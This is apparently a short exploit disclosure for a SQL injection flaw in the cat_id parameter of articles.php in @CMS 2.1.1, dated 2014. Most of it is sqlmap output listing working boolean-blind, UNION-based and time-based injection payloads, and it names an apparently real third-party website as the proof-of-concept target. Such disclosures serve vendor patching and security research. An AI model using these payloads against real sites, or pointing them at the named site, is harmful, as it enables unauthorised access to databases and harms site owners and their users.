# SQL Injection on @CMS 2.1.1 Stable

# Risk: High

# CWE number: CWE-89

# Date: 22/08/2014

# Vendor: www.atcode.net

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on: Linux Mint

# Vulnerable File: articles.php

# Exploit:  http://host/articles.php?cat_id=[SQLI]

# PoC:      http://carla-columna.de/articles.php?cat_id=[SQLI]


--- "SQLi using sqlmap."---

Place: GET
Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs
---

# Thank's